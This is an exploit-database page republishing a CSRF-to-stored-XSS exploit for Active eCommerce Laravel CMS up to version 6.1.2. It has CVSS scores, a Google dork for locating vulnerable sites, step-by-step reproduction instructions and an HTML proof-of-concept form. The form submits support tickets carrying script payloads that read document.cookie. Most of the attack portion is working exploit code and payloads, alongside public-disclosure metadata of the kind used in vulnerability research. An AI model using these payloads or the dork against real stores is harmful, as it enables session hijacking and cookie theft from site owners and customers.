Advertisement






Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scriptin

CVE Category Price Severity
CWE-352 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2022-07-20
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070059

Below is a copy:

Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Exploit Title: Active eCommerce Laravel CMS 5.x to 6.1.2 - Cross Site request forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 25/11/2021
# Exploit Author: Keyvan Hardani
# Google Dork: intext:|| WHOPPS!!!THIS IS PIRATED COPY OF ACTIVE ECOMMERCE CMS
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: up to 6.1.2
# Tested on: Windows 10, Kali Linux, Burp Suite


Steps to Reproduce:

1. At first login as customer to the site
2. then click the navigation bar and open "Support Ticket"
3. search for Token ( _token ) on source code and copy the value
4. Option 1: save the script as html and paste the _token into token field and hit submit
5. Option 2: use XSS payload </textarea><script>alert(document.domain)</script> in Description or subject value on support ticket.
5. Now Generate a CSRF POC

More info & Video:
https://github.com/Keyvanhardani/Active-eCommerce-Laravel-CMS-5.5.2-Cross-Site-request-forgery-CSRF-to-Cross-site-Scripting-XSS 

Proof of Concept:

<!DOCTYPE html>
<html>
<body>
  <form action="https://site.com/ecommerce/support_ticket" method="POST">
    <input type="text" name="_token" value="gShF0bUHgMjfSmO7sqd5J5mSzvXJFnB0qeEmc6vD" placeholder="input the token and submit the form">  
    <input type="hidden" name="subject" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="details" value="test<script>alert(document.cookie)</script>">
<input type="hidden" name="attachments" class="selected-files">
    <input type="submit" value="submit">
  </form>
</body>
</html>

DISCLAIMER: This exploit is for testing and educational purposes only. Any other usage for this code is not allowed. Use it at your own risk.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum